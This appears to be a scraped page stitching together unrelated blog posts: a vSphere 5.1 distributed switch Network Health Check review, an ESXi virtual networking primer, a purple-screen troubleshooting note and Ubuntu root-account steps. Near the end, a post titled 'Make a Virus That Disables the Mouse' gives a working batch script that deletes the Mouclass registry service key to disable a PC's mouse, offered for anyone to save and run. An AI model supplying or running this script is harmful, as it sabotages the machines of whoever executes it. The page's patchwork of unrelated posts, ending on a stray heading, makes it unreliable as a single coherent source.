New 5.1 Distributed Switch Features – Network Health Check


Another VMworld is upon us, and promises to yet again unleash a hurricane of excitement around the various products and services offered by VMware. Through some good fortune, I was invited to participate in an early access program so that I could digest the fruits of VMware’s labor a bit early and deliver content to you in a longer, lab-tested format. All of the technology presented here has been verified and “tinkered with” in the Wahl Network lab on VMware ESXi 5.1.0 build 613838 (beta).

This deep dive series will go into all of the awesome goodies that are baked into the newly released vSphere Distributed Switch (vDS) in version 5.1. I’ve broken the posts up into 4 different parts so that you can sample them at your leisure without having to run through a 40-mile-long post. Here are the links to the entire series:

Embrace The Web Client

My long-time friend and enemy, the vSphere Client, is slowly shuffling off into the corner as his spiffy new buddy takes the spotlight. The vSphere Web Client officially takes over as the lead access method from vSphere 5.1 onward. While VMware has stated that it will continue to support the vSphere Client (which you may also know as the Windows Client or the Thick Client), new functionality and features will be tightly integrated with the Web Client.

I’d highly advise that you begin getting comfortable with the Web Client. After using the vSphere Client for many years, I can say that the Web Client does take some getting used to – oftentimes I’d have both open and fight the urge to switch back. That being said, the Web Client has a ton of functionality, requires no install (yay), and has many features that the vSphere Client simply does not have (such as multitasking, scalability, etc.).

Since this is a vDS deep dive, I’ll spotlight a few differences I noticed between the two clients right away.

Creating a vDS

When creating a vDS, the first few screens look almost identical to the vSphere Client. As seen here, I have selected the new vDS version 5.1.0.

The third screen offers some neat functionality that is missing in the vSphere Client. Not only can I toggle NIOC (enabled by default), but I can also edit the default port group name. Normally I decline the offer to make a default port group because it gets a name I don’t like (dvPortgroup). Here, I can make my first one and name it myself. Nothing earth-shattering, but a thoughtful improvement.

Managing Hosts on the vDS

I am pointing this out because I was confused the first time I saw this. When you go to manage hosts on a vDS, the list is empty by default. I thought perhaps I stumbled upon a bug or did something wrong. In actuality, I just needed to press the “Choose Existing” button (highlighted below) to see the hosts that belonged to the vDS.

Now, on to the good stuff.

Network Health Check Overview

The new Network Health Check feature is at the top of my list of exciting additions in vDS 5.1. It gives administrators the ability to check for a few common misconfigurations before a virtual machine or VMkernel port is ever put on the wire.

Per VMware:

This tool is very helpful in an organization where the network administrators and vSphere administrators respectively take the management ownership of physical network switches and vSphere hosts. In such organizations vSphere admins can provide the network related warnings to the network admins and help identify issues quickly.

The Network Health Check feature looks at three distinct configurations: VLAN, MTU, and Teaming.

VLAN Mismatch

In a VLAN mismatch case, the virtual switch VLAN does not match an available VLAN on the physical switch. I think this is a rather common issue from a day-to-day perspective. For example, say that you want to use VLAN 555 for virtual machine traffic on a portgroup. If VLAN 555 does not exist on the physical switch, you won’t really know about it unless you pass some traffic on the switch first (typically by throwing a VM onto the portgroup and seeing if it can ping something). Those days are over!

As seen here, my lab host has a vDS configured named “WahlNetwork-vDS1” with Health Check enabled. I have created a number of different portgroups using VLANs 10, 254, and 555.

Only VLAN 10 exists upstream on the physical switch and shows a VLAN Status of “Supported” while all the others are “Not supported”. I am now aware that I need to check the physical interface to see what VLANs are assigned or use a different VLAN on my virtual switch (in a normal situation I may have simply entered the wrong VLAN number). Also in this example below, I want to emphasize that I have no virtual machines running at all – the Health Check can operate with absolutely nothing on the portgroup.

Under the hood, the vDS is sending some broadcast frames out to see if the VLAN exists. Note that this essentially limits the checking to the access layer, and will not flow further to the distribution (aggregation) or core layers.

MTU Mismatch

The new Network Health Check feature is also able to find MTU mismatches across the vNIC, virtual switch, physical adapter (vmnic), and physical switch port. This is very handy for Jumbo Frames, as there are a lot of touch points that all require an MTU of 9000.
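The Health Check does this probing for you, but if you want to spot-check MTU from the ESXi shell yourself, a rough sketch looks like this (the target IP is just a placeholder, not something from my lab):

# Check the MTU configured on the distributed switch and on the VMkernel interfaces
esxcli network vswitch dvs vmware list
esxcli network ip interface list

# Send a don't-fragment ping sized for a 9000-byte frame (8972 bytes of payload
# plus IP/ICMP headers); 10.0.0.1 is a placeholder target on the jumbo network
vmkping -d -s 8972 10.0.0.1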

Teaming Mismatch

The final check is for a teaming mismatch. If the physical switch is configured for EtherChannel (or Link Aggregation Group), you are supposed to set the portgroup to use a teaming policy of IP Hash. The Health Check will identify when a mismatch occurs.

In the case below, I have enabled IP Hash on a portgroup on a set of uplinks that are not in an EtherChannel. This creates a mismatch, as the virtual side is set to IP Hash while the physical side is not.

Alarms

The checks also produce alarms in vCenter that can trigger an action of your choosing (such as an email), so you don’t have to poke your nose into the Monitor section of the vDS all the time. This could be a great watchdog for ensuring that no changes are made throughout the day, or it could send an alert to your network team so they can promptly correct any changes that were made.

ESXi Networking


One of the things that quickly becomes apparent when using VMware is that you need a strong understanding of routing and switching.

This blog post is a bit self-indulgent: as I’m preparing for the VCP 5 exam, I thought it would be good to put together a few posts on the architecture of the switches.

All of the switches within ESXi are software based and operate within the VMkernel.  They are called virtual switches (vSwitches) and are Layer 2 devices, capable of understanding 802.1Q VLAN tags and passing VLAN traffic.  A common myth is that vSwitches can be trunked together like physical switches; they cannot, as one vSwitch cannot be connected to another vSwitch, which is also why vSwitches do not need Spanning Tree Protocol.

Standard Switch (vSwitch)

These are created when we first install ESXi onto our server hardware.  By default this is called vSwitch0 and contains 120 visible ports (it actually holds 128 ports, but 8 are reserved by the VMkernel), the first virtual machine port group called ‘VM Network’, and a Management Network port which is used by the VMkernel.
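You can see that default switch from the ESXi shell with a one-liner; the output includes the configured port count, MTU, uplinks, and port groups:

# List the standard vSwitches on this host, including the vSwitch0 created at install time
esxcli network vswitch standard list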

Distributed Switch (dvSwitch)

These are essentially standard switches that are logically grouped across all ESXi hosts sharing a common distributed switch configuration. They are only available with Enterprise Plus licensing.

Port Groups

These reside within a vSwitch.  Port groups come in two different types:

– VMkernel Ports carry vMotion, Fault Tolerance logging, iSCSI and NAS/NFS traffic between ESXi hosts, as well as management traffic for the ESXi host they reside on.

– VM Ports allow virtual machines to access other virtual machines or network-based resources.

The key thing to remember is that port groups must be named exactly the same across all ESXi hosts so that traffic continues to flow when a virtual machine moves between hosts.

Note that it is possible to have a vSwitch without any port groups; however, this would be like having a physical switch without any physical ports!

Uplinks (pNIC)

An uplink is the physical network adapter that the vSwitch is connected to.  Without this, the virtual machines that reside on the vSwitch would be isolated and unable to communicate with the rest of the network.

In the picture below we have a Standard Switch called vSwitch1 whose physical uplink (pNIC) is vmnic4.  It contains two different port groups, one for vMotion and Fault Tolerance logging and the other for VMs on VLAN 29.

Even though we have two different port groups, it is important to remember that each port group is a boundary for communications, broadcasts and security policies.
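For reference, a layout like the one pictured can be stood up from the ESXi shell along these lines; vSwitch1, vmnic4, and VLAN 29 come from the example above, while the port group names are my own placeholders:

# Create the vSwitch and attach its physical uplink
esxcli network vswitch standard add --vswitch-name vSwitch1
esxcli network vswitch standard uplink add --vswitch-name vSwitch1 --uplink-name vmnic4

# Add a port group for vMotion/FT logging and one for VMs, tagging the latter with VLAN 29
esxcli network vswitch standard portgroup add --vswitch-name vSwitch1 --portgroup-name vMotion-FT
esxcli network vswitch standard portgroup add --vswitch-name vSwitch1 --portgroup-name VLAN29
esxcli network vswitch standard portgroup set --portgroup-name VLAN29 --vlan-id 29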

 

VMkernel Ports

The VMkernel network carries traffic for:

– vMotion
– iSCSI
– NFS
– Fault Tolerance logging

VMkernel ports require an IP address.  You can have more than one VMkernel network if you feel that level of separation and redundancy is appropriate in your environment, or you could have a single VMkernel network carrying management traffic, Fault Tolerance logging and vMotion (however, I would recommend against this).
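As a rough sketch, creating a VMkernel port and giving it a static IP from the ESXi shell looks something like this (vmk1, the vMotion-FT port group name, and the addressing are placeholders from my earlier example, not requirements):

# Create a VMkernel interface on an existing port group and assign a static IP
esxcli network ip interface add --interface-name vmk1 --portgroup-name vMotion-FT
esxcli network ip interface ipv4 set --interface-name vmk1 --type static --ipv4 192.168.29.10 --netmask 255.255.255.0

Enabling vMotion or Fault Tolerance logging on that interface is still done through the client.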

VM Ports

Virtual machine port groups are quite different to VMkernel ports, as they do not require an IP address or an uplink (physical NIC) to work.  They work in exactly the same way as an unmanaged physical switch: you plug it in and off you go!

VLAN

Using VLANs within ESXi is generally a must unless you have an abundance of physical NICs (the limit is 32 per ESXi host).  VLANs provide secure traffic segmentation and reduce broadcast traffic across networks.

We can have multiple port groups per uplink if required.  VLAN tagging can be configured in one of three ways:

– VM Port Group: when adding a new port group you can specify the VLAN ID in the properties of the port group (most common).

– Physical Switch: the switch port that the uplink connects to is left ‘untagged’ (an access port), which forces the VM Port Group’s traffic into the VLAN ID specified on the physical switch (common).

– Virtual Guest Tagging: the virtual machine itself is responsible for VLAN tagging.  From an ESXi perspective you set the port group to VLAN ID 4095 (uncommon).

For the first and third options, the uplink’s port on the physical switch must be configured as a ‘trunk port’ so that it can carry traffic for multiple VLANs at the same time.
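Setting the VLAN ID on a port group can also be done from the ESXi shell; a quick sketch using the VLAN29 port group from earlier (VGT-PortGroup is a placeholder name, and 4095 is the special ID for Virtual Guest Tagging):

# Tag a port group with VLAN 29, or pass all VLANs through to the guest with 4095
esxcli network vswitch standard portgroup set --portgroup-name VLAN29 --vlan-id 29
esxcli network vswitch standard portgroup set --portgroup-name VGT-PortGroup --vlan-id 4095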

Below is an example standard vSwitch0 from my home lab; it has one uplink and three different VLANs in play.

VLAN 1 is the default VLAN and is used by the VMkernel Management Network and also by my Server 2012 RC machine.

VLAN 2 holds my nested ESXi hosts and the vCenter Virtual Appliance.

VLAN 3 holds my iSCSI Storage Area Networks.

NIC Teaming

NIC teaming is used to connect multiple uplinks to a single vSwitch, commonly for redundancy and load balancing purposes.

I have seen many NIC teams created with no thought given to redundancy at the network card level.

Incorrect NIC Teaming

In this configuration we have no resilience for network card failure.

Correct NIC Teaming

In this configuration we have resilience for network card failure.

NIC Teaming Load Balancing

Load balancing on ESXi NIC teams is based on the number of connections rather than throughput (think of the Round Robin style of NIC teaming on Windows Server 2003/2008).

Load balancing only occurs on outbound connections, i.e. traffic flowing from VM > vSwitch > LAN.

ESXi has a number of load balancing options which are:

Route Based on the Originating Virtual Port ID

ESXi runs an algorithm to evenly balance the number of connections across multiple uplinks, e.g. 10 virtual machines residing on one vSwitch which contains two uplinks would mean that each uplink has 5 virtual machines using it.

Once a VM is assigned to an uplink by the VMkernel, it continues to use it until the VM is vMotioned to another ESXi host or an uplink failure occurs.

Route based on the originating virtual port ID is the default setting in ESXi.
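You can confirm which policy a vSwitch is using from the ESXi shell; a quick sketch against the vSwitch1 example used earlier:

# Show the teaming policy; the Load Balancing line reflects the active setting,
# and the default corresponds to Route Based on the Originating Virtual Port ID
esxcli network vswitch standard policy failover get --vswitch-name vSwitch1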

Route Based on Source MAC Hash

This is much like ‘route based on originating virtual port ID’: the MAC addresses of the VMs do not change, and therefore they will continue to use the same connection path over and over.  The only way around this is to have multiple virtual NICs (vNICs) within the VM, which will produce multiple MAC addresses.

Route Based on IP Hash

This uses the source IP and destination IP to create a hash, so connections to different destinations can take different uplink paths.  Naturally, if you are transferring a large amount of data to a single destination, the same path is used until the transfer has finished.

When enabling ‘Route Based on IP Hash’ you will get an information bubble:

You need to ensure that all uplinks are connected to the same physical switch and that all port groups on the same vSwitch are configured to use ‘route based on IP hash’.
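From the ESXi shell, switching a standard vSwitch over to IP hash looks roughly like this (again using the vSwitch1 placeholder):

# Set IP hash load balancing; the uplinks must be in a static EtherChannel/LAG
# on the same physical switch for this to work correctly
esxcli network vswitch standard policy failover set --vswitch-name vSwitch1 --load-balancing iphash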

Use Explicit Failover Order

This isn’t really load balancing, as the secondary active uplink (vmnic1) will only come into play if vmnic4 fails.

If you have an active and standby adapter, the same procedure applies.
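A sketch of the equivalent from the ESXi shell, using the vmnic4/vmnic1 pairing from the example above (vSwitch1 is a placeholder):

# Explicit failover order: vmnic4 is used first, vmnic1 only takes over if vmnic4 fails
esxcli network vswitch standard policy failover set --vswitch-name vSwitch1 --load-balancing explicit --active-uplinks vmnic4,vmnic1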

All load balancing policies have ‘Notify Switches’ enabled by default. What does this actually mean? It means the vSwitch notifies the physical switches, so they can update their MAC address tables, whenever:

– A vMotion occurs
– A MAC address is changed
– A NIC team failover or failback has occurred
– A VM is powered on

Virtual Switch Security

Virtual switch security has three different elements which are:

– Promiscuous Mode: whether the vSwitch and/or port group will deliver traffic to a VM that is not destined for it.
– MAC Address Changes: whether the vSwitch and/or port group will accept incoming traffic for a VM whose effective MAC address has been altered.
– Forged Transmits: whether the vSwitch and/or port group will allow outgoing traffic whose source MAC address has been altered.

In all of the above configurations you have a choice to either Reject or Accept the traffic.

VMware recommends that all of these are set to reject.

However, Network Load Balancing and devices with ‘virtual IP addresses’, such as hardware load balancers, often use an algorithm that produces a shared MAC address which differs from the original source or destination MAC address, and this can cause traffic not to pass when these policies are set to Reject.

If in doubt you can always turn all three to Reject; however, I would recommend letting the server team know first!
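For completeness, here is a sketch of checking and then hardening these settings from the ESXi shell (vSwitch1 is a placeholder):

# Show the current security policy, then set all three elements to Reject
esxcli network vswitch standard policy security get --vswitch-name vSwitch1
esxcli network vswitch standard policy security set --vswitch-name vSwitch1 --allow-promiscuous false --allow-mac-change false --allow-forged-transmits false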

ESXi 5 Purple Screen of Death in VMware Workstation 8


Interpreting the Errors

I was able to find an excellent VMware knowledge base article on how to interpret purple screen errors.  You can find it here: Interpreting an ESX host purple diagnostic screen

When I returned to make Workstation the active window, I was confronted with the dialogue box below, glowing purple from what awaited me in the background.

Hmm.  So from line 2 of the screen shot below, we can see that physical CPU 0 (pCPU 0) had no heartbeats.  Then a bit further down the message, we can see that pCPU 0 “didn’t have a heartbeat for 2728 seconds,” and that it “*may* be locked up.”  This tells me that the virtualized ESXi box was basically unresponsive for about 45 minutes.

What’s the problem?

I couldn’t find anything specific that told me exactly what the problem was, but I came to the conclusion that it was the laptop power settings causing the issue.  When working in the test lab in the past, I was usually active in the lab – never letting the computer go into power saving mode.  Apparently, I left the laptop idle too long and it went to sleep and stopped the hard disks.

I’m using Windows 7 Ultimate 64-bit.  You can change the power settings easily by going to Control Panel > Power Options > Change when the computer sleeps, and changing the appropriate options to never put the computer to sleep.

Root Access for Ubuntu


To set or change the root password:

$ sudo passwd root

  1. Enter your User account password
  2. Enter new root password
  3. Retype root password

Change Ubuntu terminal username


The first thing you need to do is press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the command below; you’ll be prompted to create a new password for the root account.

sudo passwd root

 

Next, run the command below to unlock the root account.

sudo passwd -u root

 

After unlocking it, log out and log in as the root user from the logon screen.

 

Once you have logged in as root, press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the command below to change your username.

usermod -c "Real Name" -l new_name old_name
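If you also want the home directory and primary group to follow the new name, something along these lines should do it (a sketch using the same new_name/old_name placeholders; run it as root):

# Move the home directory to match the new username, then rename the primary group
usermod -d /home/new_name -m new_name
groupmod -n new_name old_name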

 

 

When you’re done, lock the root account again and restart.

passwd -l root

Make a Virus That Disables the Mouse


This is a batch virus which is harmful: it will disable your mouse. Think before trying it on yourself.

  • Open Notepad and copy the code below

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

  • Save this file as virus.bat
  • Done, you have just created your virus.

Installing Lync Server Enterprise – Part One

